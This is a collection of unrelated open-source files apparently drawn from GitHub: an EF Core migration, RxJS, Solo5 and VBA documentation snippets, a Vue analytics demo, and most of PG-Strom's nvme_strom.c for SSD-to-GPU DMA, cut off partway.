"UserId"); migrationBuilder.CreateIndex( name: "IX_AspNetUserLogins_UserId", table: "AspNetUserLogins", column: "UserId"); migrationBuilder.CreateIndex( name: "IX_AspNetUserRoles_RoleId", table: "AspNetUserRoles", column: "RoleId"); migrationBuilder.CreateIndex( name: "EmailIndex", table: "AspNetUsers", column: "NormalizedEmail"); migrationBuilder.CreateIndex( name: "UserNameIndex", table: "AspNetUsers", column: "NormalizedUserName", unique: true); } protected override void Down(MigrationBuilder migrationBuilder) { migrationBuilder.DropTable( name: "AspNetRoleClaims"); migrationBuilder.DropTable( name: "AspNetUserClaims"); migrationBuilder.DropTable( name: "AspNetUserLogins"); migrationBuilder.DropTable( name: "AspNetUserRoles"); migrationBuilder.DropTable( name: "AspNetUserTokens"); migrationBuilder.DropTable( name: "AspNetRoles"); migrationBuilder.DropTable( name: "AspNetUsers"); } } }
{ "pile_set_name": "Github" }
/** PURE_IMPORTS_START PURE_IMPORTS_END */ export var rxSubscriber = /*@__PURE__*/ (function () { return typeof Symbol === 'function' ? /*@__PURE__*/ Symbol('rxSubscriber') : '@@rxSubscriber_' + /*@__PURE__*/ Math.random(); })(); export var $$rxSubscriber = rxSubscriber; //# sourceMappingURL=rxSubscriber.js.map
{ "pile_set_name": "Github" }
#!/bin/bash -ex DIR=$(dirname "$0") cp "$DIR/../../version.json" "$DIR/../config" yarn workspaces focus fxa-profile-server yarn test
{ "pile_set_name": "Github" }
/* * Copyright (c) 2017 Contributors as noted in the AUTHORS file * * This file is part of Solo5, a sandboxed execution environment. * * Permission to use, copy, modify, and/or distribute this software * for any purpose with or without fee is hereby granted, provided * that the above copyright notice and this permission notice appear * in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL * WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE * AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR * CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS * OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, * NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #ifndef MUEN_CHANNEL_READER_H #define MUEN_CHANNEL_READER_H #include "channel.h" enum muchannel_reader_result { MUCHANNEL_INACTIVE, MUCHANNEL_INCOMPATIBLE_INTERFACE, MUCHANNEL_EPOCH_CHANGED, MUCHANNEL_NO_DATA, MUCHANNEL_OVERRUN_DETECTED, MUCHANNEL_SUCCESS }; struct muchannel_reader { uint64_t epoch; uint64_t protocol; uint64_t size; uint64_t elements; uint64_t rc; }; /* * Initialize reader with given protocol. */ void muen_channel_init_reader(struct muchannel_reader *reader, uint64_t protocol); /* * Read next element from given channel. */ enum muchannel_reader_result muen_channel_read( const struct muchannel * const channel, struct muchannel_reader *reader, void *element); /* * Drain all current channel elements. */ void muen_channel_drain(const struct muchannel * const channel, struct muchannel_reader *reader); /* * Returns True if there is pending data in the channel. */ bool muen_channel_has_pending_data(const struct muchannel * const channel, struct muchannel_reader *reader); #endif
{ "pile_set_name": "Github" }
--- title: QueryClose Constants keywords: vblr6.chm1106127 f1_keywords: - vblr6.chm1106127 ms.prod: office ms.assetid: 0e7ca25d-316c-53bb-4213-1b0c8d529de4 ms.date: 06/08/2017 --- # QueryClose Constants The following [constants](vbe-glossary.md) can be used anywhere in your code in place of the actual values: |**Constant**|**Value**|**Description**| |:-----|:-----|:-----| |**vbFormControlMenu**|0|The user chose the **Close** command from the **Control** menu on the form.| |**vbFormCode**|1|The **Unload** statement is invoked from code.| |**vbAppWindows**|2|The current Microsoft Windows operating environment session is ending.| |**vbAppTaskManager**|3|The Windows **Task Manager** is closing the application.|
{ "pile_set_name": "Github" }
import Vue from 'vue/dist/vue.js' import VueMultianalytics from '../dist/vue-multianalytics.min' import analyticsMixin from './analytics-mixin' let gaConfig = { appName: 'Test', // Mandatory appVersion: '0.1', // Mandatory trackingId: 'UA-96678006-1', // Mandatory globalDimensions: [], globalMetrics: [], debug: true } let mixpanelConfig = { token: '933572e86a323c77cf71d8c2d376fc5e', config: {}, debug: true } Vue.use(VueMultianalytics, { modules: { ga: gaConfig, mixpanel: mixpanelConfig, mparticle: mParticleConfig } }, analyticsMixin) let template = ` <div> <div>{{message}}</div> <button @click="trackView()">Track View</button> <button @click="trackEvent()">Track Event</button> <button @click="trackException()">Track Exception</button> <button @click="testMixin()">Test Mixin</button> <button @click="setUserProperties()">User properties</button> <button @click="setSuperProperties()">Super properties</button> </div> ` const app = new Vue({ el: '#app', template: template, data: { message: 'Hello MultiAnalytics' }, mounted () { console.log(this.$ma) }, methods: { trackEvent () { this.$ma.trackEvent({action: 'test category', category: 'clicks', properties: {interesting: true}, eventType: 2}) }, trackView () { this.$ma.trackView({viewName: 'test view'}) }, trackException () { this.$ma.trackException({description: 'test exception', isFatal: true}) }, testMixin () { this.$mam.test() }, setUserProperties () { this.$ma.setUserProperties({userId: 'userTest', identityType: 3, platform: 'web'}) }, setSuperProperties () { this.$ma.setSuperProperties({platform: 'web'}) }, ecommerceTrackEvent () { let product = { name: 'product name', description: 'Product description', price: 100.56, quantity: 5 } this.$ma.ecommerceTrackEvent({product, properties: {currency: 'USD'}}) } } })
{ "pile_set_name": "Github" }
/* * nvme_strom.c * * Routines to support optional SSD-to-GPU Direct DMA Loading * ---- * Copyright 2011-2017 (C) KaiGai Kohei <[email protected]> * Copyright 2014-2017 (C) The PG-Strom Development Team * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include "postgres.h" #include "catalog/pg_type.h" #include "commands/tablespace.h" #include "funcapi.h" #include "storage/ipc.h" #include "storage/bufmgr.h" #include "utils/builtins.h" #include "utils/guc.h" #include "utils/inval.h" #include "utils/rel.h" #include "utils/syscache.h" #include "pg_strom.h" #include "nvme_strom.h" #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/statvfs.h> #include <sys/types.h> #include <unistd.h> #define IOMAPBUF_CHUNKSZ_MAX_BIT 34 /* 16G */ #define IOMAPBUF_CHUNKSZ_MIN_BIT 12 /* 4KB */ #define IOMAPBUF_CHUNKSZ_MAX (1UL << IOMAPBUF_CHUNKSZ_MAX_BIT) #define IOMAPBUF_CHUNKSZ_MIN (1UL << IOMAPBUF_CHUNKSZ_MIN_BIT) typedef struct { dlist_node free_chain; /* zero, if active chunk */ cl_uint mclass; /* zero, if not chunk head */ } IOMapBufferChunk; typedef struct { CUipcMemHandle cuda_mhandle; unsigned long iomap_handle; uint32_t gpu_page_sz; uint32_t gpu_npages; /* fields below are protected by the lock */ slock_t lock; dlist_head free_chunks[IOMAPBUF_CHUNKSZ_MAX_BIT + 1]; IOMapBufferChunk iomap_chunks[FLEXIBLE_ARRAY_MEMBER]; } IOMapBufferSegment; static shmem_startup_hook_type shmem_startup_next = NULL; static const char *nvme_strom_ioctl_pathname = "/proc/nvme-strom"; static void *iomap_buffer_segments = NULL; static CUdeviceptr iomap_buffer_base = 0UL; /* per process vaddr */ static Size iomap_buffer_size; /* GUC */ static HTAB *vfs_nvme_htable = NULL; static Oid nvme_last_tablespace_oid = InvalidOid; static bool nvme_last_tablespace_supported; static bool debug_force_nvme_strom = false; /* GUC */ static bool nvme_strom_enabled = true; /* GUC */ static long sysconf_pagesize; /* _SC_PAGESIZE */ static long sysconf_phys_pages; /* _SC_PHYS_PAGES */ static long nvme_strom_threshold; #define SizeOfIOMapBufferSegment \ MAXALIGN(offsetof(IOMapBufferSegment, \ iomap_chunks[iomap_buffer_size >> \ IOMAPBUF_CHUNKSZ_MIN_BIT])) #define GetIOMapBufferSegment(dindex) \ ((IOMapBufferSegment *)((char *)iomap_buffer_segments + \ SizeOfIOMapBufferSegment * (dindex))) #if 0 /* * gpuMemSizeIOMap - returns configured size of the i/o mapped device memory; * never guaranteed it is actually allocated and mapped. */ Size gpuMemSizeIOMap(void) { return iomap_buffer_size; } #endif /* * nvme_strom_ioctl */ static int nvme_strom_ioctl(int cmd, const void *arg) { static int fdesc_nvme_strom = -1; if (fdesc_nvme_strom < 0) { fdesc_nvme_strom = open(nvme_strom_ioctl_pathname, O_RDONLY); if (fdesc_nvme_strom < 0) elog(ERROR, "failed to open %s: %m", nvme_strom_ioctl_pathname); } return ioctl(fdesc_nvme_strom, cmd, arg); } #if 0 /* * gpuMemSplitIOMap */ static bool gpuMemSplitIOMap(IOMapBufferSegment *iomap_seg, int mclass) { IOMapBufferChunk *iomap_chunk_1; IOMapBufferChunk *iomap_chunk_2; dlist_node *dnode; int offset; if (mclass > IOMAPBUF_CHUNKSZ_MAX_BIT) return false; Assert(mclass > IOMAPBUF_CHUNKSZ_MIN_BIT); if (dlist_is_empty(&iomap_seg->free_chunks[mclass])) { if (!gpuMemSplitIOMap(iomap_seg, mclass + 1)) return false; } Assert(!dlist_is_empty(&iomap_seg->free_chunks[mclass])); offset = 1UL << (mclass - 1 - IOMAPBUF_CHUNKSZ_MIN_BIT); dnode = dlist_pop_head_node(&iomap_seg->free_chunks[mclass]); iomap_chunk_1 = dlist_container(IOMapBufferChunk, free_chain, dnode); iomap_chunk_2 = iomap_chunk_1 + offset; Assert(iomap_chunk_2->mclass == 0); iomap_chunk_1->mclass = mclass - 1; iomap_chunk_2->mclass = mclass - 1; dlist_push_tail(&iomap_seg->free_chunks[mclass - 1], &iomap_chunk_1->free_chain); dlist_push_tail(&iomap_seg->free_chunks[mclass - 1], &iomap_chunk_2->free_chain); return true; } /* * gpuMemAllocIOMap * * Allocation of device memory which is mapped to I/O address space */ CUresult gpuMemAllocIOMap(GpuContext *gcontext, CUdeviceptr *p_devptr, size_t bytesize) { IOMapBufferSegment *iomap_seg; IOMapBufferChunk *iomap_chunk; int mclass; int index; dlist_node *dnode; CUdeviceptr devptr; CUresult rc; static pthread_mutex_t iomap_buffer_mutex = PTHREAD_MUTEX_INITIALIZER; Assert(IsGpuServerProcess()); if (!iomap_buffer_segments) return CUDA_ERROR_OUT_OF_MEMORY; /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) return CUDA_ERROR_OUT_OF_MEMORY; pthreadMutexLock(&iomap_buffer_mutex); if (!iomap_buffer_base) { rc = cuIpcOpenMemHandle(&iomap_buffer_base, iomap_seg->cuda_mhandle, CU_IPC_MEM_LAZY_ENABLE_PEER_ACCESS); if (rc != CUDA_SUCCESS) { pthreadMutexUnlock(&iomap_buffer_mutex); werror("failed on cuIpcOpenMemHandle: %s", errorText(rc)); } } pthreadMutexUnlock(&iomap_buffer_mutex); /* * Do allocation */ mclass = get_next_log2(bytesize); if (mclass < IOMAPBUF_CHUNKSZ_MIN_BIT) mclass = IOMAPBUF_CHUNKSZ_MIN_BIT; else if (mclass > IOMAPBUF_CHUNKSZ_MAX_BIT) return CUDA_ERROR_OUT_OF_MEMORY; SpinLockAcquire(&iomap_seg->lock); if (dlist_is_empty(&iomap_seg->free_chunks[mclass])) { /* split larger mclass */ if (!gpuMemSplitIOMap(iomap_seg, mclass + 1)) { SpinLockRelease(&iomap_seg->lock); return CUDA_ERROR_OUT_OF_MEMORY; } } Assert(!dlist_is_empty(&iomap_seg->free_chunks[mclass])); dnode = dlist_pop_head_node(&iomap_seg->free_chunks[mclass]); iomap_chunk = dlist_container(IOMapBufferChunk, free_chain, dnode); Assert(iomap_chunk->mclass == mclass); memset(&iomap_chunk->free_chain, 0, sizeof(dlist_node)); SpinLockRelease(&iomap_seg->lock); Assert(iomap_chunk >= iomap_seg->iomap_chunks); index = iomap_chunk - iomap_seg->iomap_chunks; Assert(index < iomap_buffer_size >> IOMAPBUF_CHUNKSZ_MIN_BIT); devptr = iomap_buffer_base + ((Size)index << IOMAPBUF_CHUNKSZ_MIN_BIT); trackIOMapMem(gcontext, devptr); Assert(devptr >= iomap_buffer_base && devptr + bytesize <= iomap_buffer_base + iomap_buffer_size); *p_devptr = devptr; return CUDA_SUCCESS; } /* * gpuMemFreeIOMap * * Release of device memory which is mapped to I/O address space */ CUresult gpuMemFreeIOMap(GpuContext *gcontext, CUdeviceptr devptr) { IOMapBufferSegment *iomap_seg; IOMapBufferChunk *iomap_chunk; IOMapBufferChunk *iomap_buddy; int index; int shift; /* If called on PostgreSQL backend, send a request to release */ if (!IsGpuServerProcess()) { gpuservSendIOMapMemFree(gcontext, devptr); return CUDA_SUCCESS; } if (gcontext) untrackIOMapMem(gcontext, devptr); if (!iomap_buffer_base) return CUDA_ERROR_NOT_INITIALIZED; /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) return CUDA_ERROR_NOT_INITIALIZED; if (devptr < iomap_buffer_base || devptr > iomap_buffer_base + iomap_buffer_size) return CUDA_ERROR_INVALID_VALUE; SpinLockAcquire(&iomap_seg->lock); Assert((devptr & (IOMAPBUF_CHUNKSZ_MIN - 1)) == 0); index = (devptr - iomap_buffer_base) >> IOMAPBUF_CHUNKSZ_MIN_BIT; iomap_chunk = &iomap_seg->iomap_chunks[index]; Assert(!iomap_chunk->free_chain.prev && !iomap_chunk->free_chain.next); /* * Try to merge with the neighbor chunks */ while (iomap_chunk->mclass < IOMAPBUF_CHUNKSZ_MAX_BIT) { index = iomap_chunk - iomap_seg->iomap_chunks; shift = 1UL << (iomap_chunk->mclass - IOMAPBUF_CHUNKSZ_MIN_BIT); Assert((index & (shift - 1)) == 0); if ((index & shift) == 0) { /* try to merge with next */ iomap_buddy = &iomap_seg->iomap_chunks[index + shift]; if (iomap_buddy->free_chain.prev && iomap_buddy->free_chain.next && iomap_buddy->mclass == iomap_chunk->mclass) { /* OK, let's merge */ dlist_delete(&iomap_buddy->free_chain); memset(iomap_buddy, 0, sizeof(IOMapBufferChunk)); iomap_chunk->mclass++; } else break; /* give up to merge chunks any more */ } else { /* try to merge with prev */ iomap_buddy = &iomap_seg->iomap_chunks[index - shift]; if (iomap_buddy->free_chain.prev && iomap_buddy->free_chain.next && iomap_buddy->mclass == iomap_chunk->mclass) { /* OK, let's merge */ dlist_delete(&iomap_buddy->free_chain); memset(&iomap_buddy->free_chain, 0, sizeof(dlist_node)); memset(iomap_chunk, 0, sizeof(IOMapBufferChunk)); iomap_buddy->mclass++; iomap_chunk = iomap_buddy; } else break; /* give up to merge chunks any more */ } } /* back to the free list again */ Assert(iomap_chunk->mclass >= IOMAPBUF_CHUNKSZ_MIN_BIT && iomap_chunk->mclass <= IOMAPBUF_CHUNKSZ_MAX_BIT); dlist_push_head(&iomap_seg->free_chunks[iomap_chunk->mclass], &iomap_chunk->free_chain); SpinLockRelease(&iomap_seg->lock); return CUDA_SUCCESS; } #endif /* * gpuMemCopyFromSSDWaitRaw */ static void gpuMemCopyFromSSDWaitRaw(unsigned long dma_task_id) { StromCmd__MemCopyWait cmd; memset(&cmd, 0, sizeof(StromCmd__MemCopyWait)); cmd.dma_task_id = dma_task_id; if (nvme_strom_ioctl(STROM_IOCTL__MEMCPY_WAIT, &cmd) != 0) werror("failed on nvme_strom_ioctl(STROM_IOCTL__MEMCPY_WAIT): %m"); } /* * gpuMemCopyFromSSD - kick SSD-to-GPU Direct DMA, then wait for completion */ void gpuMemCopyFromSSD(GpuTask *gtask, CUdeviceptr m_kds, pgstrom_data_store *pds) { StromCmd__MemCopySsdToGpu cmd; IOMapBufferSegment *iomap_seg; BlockNumber *block_nums; void *block_data; size_t offset; size_t length; cl_uint nr_loaded; CUresult rc; Assert(IsGpuServerProcess()); if (!iomap_buffer_segments) werror("NVMe-Strom is not configured"); /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) werror("NVMe-Strom is not initialized yet"); /* Device memory should be already imported on allocation time */ Assert(iomap_buffer_base != 0UL); /* PDS/KDS format check */ Assert(pds->kds.format == KDS_FORMAT_BLOCK); if (m_kds < iomap_buffer_base || m_kds + pds->kds.length > iomap_buffer_base + iomap_buffer_size) werror("NVMe-Strom: P2P DMA destination out of range"); offset = m_kds - iomap_buffer_base; /* nothing special if all the blocks are already loaded */ if (pds->nblocks_uncached == 0) { rc = cuMemcpyHtoDAsync(m_kds, &pds->kds, pds->kds.length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); return; } Assert(pds->nblocks_uncached <= pds->kds.nitems); nr_loaded = pds->kds.nitems - pds->nblocks_uncached; length = ((char *)KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, nr_loaded) - (char *)(&pds->kds)); offset += length; /* userspace pointers */ block_nums = (BlockNumber *)KERN_DATA_STORE_BODY(&pds->kds) + nr_loaded; block_data = KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, nr_loaded); /* setup ioctl(2) command */ memset(&cmd, 0, sizeof(StromCmd__MemCopySsdToGpu)); cmd.handle = iomap_seg->iomap_handle; cmd.offset = offset; cmd.file_desc = gtask->file_desc; cmd.nr_chunks = pds->nblocks_uncached; cmd.chunk_sz = BLCKSZ; cmd.relseg_sz = RELSEG_SIZE; cmd.chunk_ids = block_nums; cmd.wb_buffer = block_data; /* (1) kick SSD2GPU P2P DMA */ if (nvme_strom_ioctl(STROM_IOCTL__MEMCPY_SSD2GPU, &cmd) != 0) abort(); //werror("failed on STROM_IOCTL__MEMCPY_SSD2GPU: %m"); /* (2) kick RAM2GPU DMA (earlier half) */ rc = cuMemcpyHtoDAsync(m_kds, &pds->kds, length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) { gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); } /* (3) kick RAM2GPU DMA (later half; if any) */ if (cmd.nr_ram2gpu > 0) { length = BLCKSZ * cmd.nr_ram2gpu; offset = ((char *)KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, pds->kds.nitems) - (char *)&pds->kds) - length; rc = cuMemcpyHtoDAsync(m_kds + offset, (char *)&pds->kds + offset, length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) { gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); } } /* (4) wait for completion of SSD2GPU P2P DMA */ gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); } /* * TablespaceCanUseNvmeStrom */ typedef struct { Oid tablespace_oid; bool nvme_strom_supported; } vfs_nvme_status; static void vfs_nvme_cache_callback(Datum arg, int cacheid, uint32 hashvalue) { /* invalidate all the cached status */ if (vfs_nvme_htable) { hash_destroy(vfs_nvme_htable); vfs_nvme_htable = NULL; nvme_last_tablespace_oid = InvalidOid; } } static bool TablespaceCanUseNvmeStrom(Oid tablespace_oid) { vfs_nvme_status *entry; const char *pathname; int fdesc; bool found; if (iomap_buffer_size == 0 || !nvme_strom_enabled) return false; /* NVMe-Strom is not configured or enabled */ if (!OidIsValid(tablespace_oid)) tablespace_oid = MyDatabaseTableSpace; /* quick lookup but sufficient for more than 99.99% cases */ if (OidIsValid(nvme_last_tablespace_oid) && nvme_last_tablespace_oid == tablespace_oid) return nvme_last_tablespace_supported; if (!vfs_nvme_htable) { HASHCTL ctl; memset(&ctl, 0, sizeof(HASHCTL)); ctl.keysize = sizeof(Oid); ctl.entrysize = sizeof(vfs_nvme_status); vfs_nvme_htable = hash_create("VFS:NVMe-Strom status", 64, &ctl, HASH_ELEM | HASH_BLOBS); CacheRegisterSyscacheCallback(TABLESPACEOID, vfs_nvme_cache_callback, (Datum) 0); } entry = (vfs_nvme_status *) hash_search(vfs_nvme_htable, &tablespace_oid, HASH_ENTER, &found); if (found) { nvme_last_tablespace_oid = tablespace_oid; nvme_last_tablespace_supported = entry->nvme_strom_supported; return entry->nvme_strom_supported; } /* check whether the tablespace is supported */ entry->tablespace_oid = tablespace_oid; entry->nvme_strom_supported = false; pathname = GetDatabasePath(MyDatabaseId, tablespace_oid); fdesc = open(pathname, O_RDONLY | O_DIRECTORY); if (fdesc < 0) { elog(WARNING, "failed to open \"%s\" of tablespace \"%s\": %m", pathname, get_tablespace_name(tablespace_oid)); } else { StromCmd__CheckFile cmd; cmd.fdesc = fdesc; if (nvme_strom_ioctl(STROM_IOCTL__CHECK_FILE, &cmd) == 0) entry->nvme_strom_supported = true; else { ereport(NOTICE, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED), errmsg("nvme_strom does not support tablespace \"%s\"", get_tablespace_name(tablespace_oid)))); } } nvme_last_tablespace_oid = tablespace_oid; nvme_last_tablespace_supported = entry->nvme_strom_supported; return entry->nvme_strom_supported; } bool RelationCanUseNvmeStrom(Relation relation) { Oid tablespace_oid = RelationGetForm(relation)->reltablespace; /* SSD2GPU on temp relation is not supported */ if (RelationUsesLocalBuffers(relation)) return false; return TablespaceCanUseNvmeStrom(tablespace_oid); } /* * RelationWillUseNvmeStrom */ bool RelationWillUseNvmeStrom(Relation relation, BlockNumber *p_nr_blocks) { BlockNumber nr_blocks; /* at least, storage must support NVMe-Strom */ if (!RelationCanUseNvmeStrom(relation)) return false; /* * NOTE: RelationGetNumberOfBlocks() has a significant but helpful * side-effect. It opens all the underlying files of MAIN_FORKNUM, * then set @rd_smgr of the relation. * It allows extension to touch file descriptors without invocation of * ReadBuffer(). */ nr_blocks = RelationGetNumberOfBlocks(relation); if (!debug_force_nvme_strom && nr_blocks < nvme_strom_threshold) return false; /* * ok, it looks to me NVMe-Strom is supported, and relation size is * reasonably large to run with SSD-to-GPU Direct mode. */ if (p_nr_blocks) *p_nr_blocks = nr_blocks; return true; } /* * ScanPathWillUseNvmeStrom - Optimizer Hint */ bool ScanPathWillUseNvmeStrom(PlannerInfo *root, RelOptInfo *baserel) { RangeTblEntry *rte; HeapTuple tuple; bool relpersistence; if (!TablespaceCanUseNvmeStrom(baserel->reltablespace)) return false; /* unable to apply NVMe-Strom on temporay tables */ rte = root->simple_rte_array[baserel->relid]; tuple = SearchSysCache1(RELOID, ObjectIdGetDatum(rte->relid)); if (!HeapTupleIsValid(tuple)) elog(ERROR, "cache lookup failed for relation %u", rte->relid); relpersistence = ((Form_pg_class) GETSTRUCT(tuple))->relpersistence; ReleaseSysCache(tuple); if (relpersistence != RELPERSISTENCE_PERMANENT && relpersistence != RELPERSISTENCE_UNLOGGED) return false; /* Is number of blocks sufficient to NVMe-Strom? */ if (!debug_force_nvme_strom && baserel->pages < nvme_strom_threshold) return false; /* ok, this table scan can use nvme-strom */ return true; } /* * pgstrom_iomap_buffer_info */ typedef struct { cl_uint nitems; struct { cl_int gpuid; cl_bool is_used; cl_ulong offset; cl_ulong length; } chunks[FLEXIBLE_ARRAY_MEMBER]; } iomap_buffer_info; static void setup_iomap_buffer_info(IOMapBufferSegment *iomap_seg, int gpuid, iomap_buffer_info *iomap_info) { int limit = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; int index = 0; SpinLockAcquire(&iomap_seg->lock); while (index < limit) { IOMapBufferChunk *iomap_chunk = &iomap_seg->iomap_chunks[index]; int j = iomap_info->nitems++; iomap_info->chunks[j].gpuid = gpuid; iomap_info->chunks[j].is_used = (!iomap_chunk->free_chain.prev && !iomap_chunk->free_chain.next); iomap_info->chunks[j].offset = index * IOMAPBUF_CHUNKSZ_MIN; iomap_info->chunks[j].length = (1UL << iomap_chunk->mclass); index += 1UL << (iomap_chunk->mclass - IOMAPBUF_CHUNKSZ_MIN_BIT); } SpinLockRelease(&iomap_seg->lock); } #if 1 void dump_iomap_buffer_info(void) { iomap_buffer_info *iomap_info; int i, max_nchunks; max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; iomap_info = palloc(offsetof(iomap_buffer_info, chunks[max_nchunks * numDevAttrs])); iomap_info->nitems = 0; if (iomap_buffer_segments) { for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); cl_int gpuid = devAttrs[i].DEV_ID; setup_iomap_buffer_info(iomap_seg, gpuid, iomap_info); } if (iomap_info->nitems > 0) fputc('\n', stderr); for (i=0; i < iomap_info->nitems; i++) { fprintf(stderr, "GPU%d 0x%p - 0x%p len=%zu %s\n", iomap_info->chunks[i].gpuid, (char *)(iomap_info->chunks[i].offset), (char *)(iomap_info->chunks[i].offset + iomap_info->chunks[i].length), (size_t)(iomap_info->chunks[i].length), iomap_info->chunks[i].is_used ? "used" : "free"); } } pfree(iomap_info); } #endif Datum pgstrom_iomap_buffer_info(PG_FUNCTION_ARGS) { FuncCallContext *fncxt; iomap_buffer_info *iomap_info; Datum values[4]; bool isnull[4]; int i; HeapTuple tuple; if (SRF_IS_FIRSTCALL()) { TupleDesc tupdesc; MemoryContext oldcxt; int max_nchunks; fncxt = SRF_FIRSTCALL_INIT(); oldcxt = MemoryContextSwitchTo(fncxt->multi_call_memory_ctx); tupdesc = CreateTemplateTupleDesc(4, false); TupleDescInitEntry(tupdesc, (AttrNumber) 1, "gpuid", INT4OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 2, "offset", INT8OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 3, "length", INT8OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 4, "state", TEXTOID, -1, 0); fncxt->tuple_desc = BlessTupleDesc(tupdesc); max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; iomap_info = palloc(offsetof(iomap_buffer_info, chunks[max_nchunks * numDevAttrs])); iomap_info->nitems = 0; if (iomap_buffer_segments) { for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); cl_int gpuid = devAttrs[i].DEV_ID; setup_iomap_buffer_info(iomap_seg, gpuid, iomap_info); } } fncxt->user_fctx = iomap_info; MemoryContextSwitchTo(oldcxt); } fncxt = SRF_PERCALL_SETUP(); iomap_info = fncxt->user_fctx; if (fncxt->call_cntr >= iomap_info->nitems) SRF_RETURN_DONE(fncxt); i = fncxt->call_cntr; memset(isnull, 0, sizeof(isnull)); values[0] = Int32GetDatum(iomap_info->chunks[i].gpuid); values[1] = Int64GetDatum(iomap_info->chunks[i].offset); values[2] = Int64GetDatum(iomap_info->chunks[i].length); values[3] = PointerGetDatum(cstring_to_text(iomap_info->chunks[i].is_used ? "used" : "free")); tuple = heap_form_tuple(fncxt->tuple_desc, values, isnull); SRF_RETURN_NEXT(fncxt, HeapTupleGetDatum(tuple)); } PG_FUNCTION_INFO_V1(pgstrom_iomap_buffer_info); /* * iomap_buffer_owner_main * * MEMO: Since CUDA 8.0, once a process call cuInit(), then its forked child * processes will fail on cuInit() after that. It means, postmaster process * cannot touch CUDA APIs thus never be a holder of CUDA resources. * So, this background worker performs a lazy resource holder of i/o mapped * buffer for SSD2GPU P2P DMA. */ static void iomap_buffer_owner_main(Datum __arg) { char *pos; int i, j; int ev; CUresult rc; /* no special handling is needed on SIGTERM/SIGQUIT; just die */ BackgroundWorkerUnblockSignals(); /* init CUDA runtime */ rc = cuInit(0); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuInit: %s", errorText(rc)); /* allocate device memory and map to the host physical memory space */ pos = iomap_buffer_segments; for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); CUdevice cuda_device; CUcontext cuda_context; CUdeviceptr cuda_devptr; CUipcMemHandle cuda_mhandle; Size remain; int mclass; StromCmd__MapGpuMemory cmd; /* setup i/o mapped device memory for each GPU device */ rc = cuDeviceGet(&cuda_device, devAttrs[i].DEV_ID); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuDeviceGet: %s", errorText(rc)); rc = cuCtxCreate(&cuda_context, CU_CTX_SCHED_AUTO, cuda_device); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuCtxCreate: %s", errorText(rc)); rc = cuMemAlloc(&cuda_devptr, iomap_buffer_size); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuMemAlloc: %s", errorText(rc)); rc = cuIpcGetMemHandle(&cuda_mhandle, cuda_devptr); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuIpcGetMemHandle: %s", errorText(rc)); memset(&cmd, 0, sizeof(StromCmd__MapGpuMemory)); cmd.vaddress = cuda_devptr; cmd.length = iomap_buffer_size; if (nvme_strom_ioctl(STROM_IOCTL__MAP_GPU_MEMORY, &cmd) != 0) elog(ERROR, "STROM_IOCTL__MAP_GPU_MEMORY failed: %m"); if (iomap_buffer_size % cmd.gpu_page_sz != 0) elog(WARNING, "i/o mapped GPU memory size (%zu) is not aligned to GPU page size(%u)", iomap_buffer_size, cmd.gpu_page_sz); /* setup IOMapBufferSegment */ elog(LOG, "NVMe-Strom: GPU Device Memory (%p-%p; %zuMB) is mapped", (char *)cuda_devptr, (char *)cuda_devptr + iomap_buffer_size - 1, (size_t)(iomap_buffer_size >> 20)); memcpy(&iomap_seg->cuda_mhandle, &cuda_mhandle, sizeof(CUipcMemHandle)); iomap_seg->gpu_page_sz = cmd.gpu_page_sz; iomap_seg->gpu_npages = cmd.gpu_npages; SpinLockInit(&iomap_seg->lock); for (j=0; j <= IOMAPBUF_CHUNKSZ_MAX_BIT; j++) 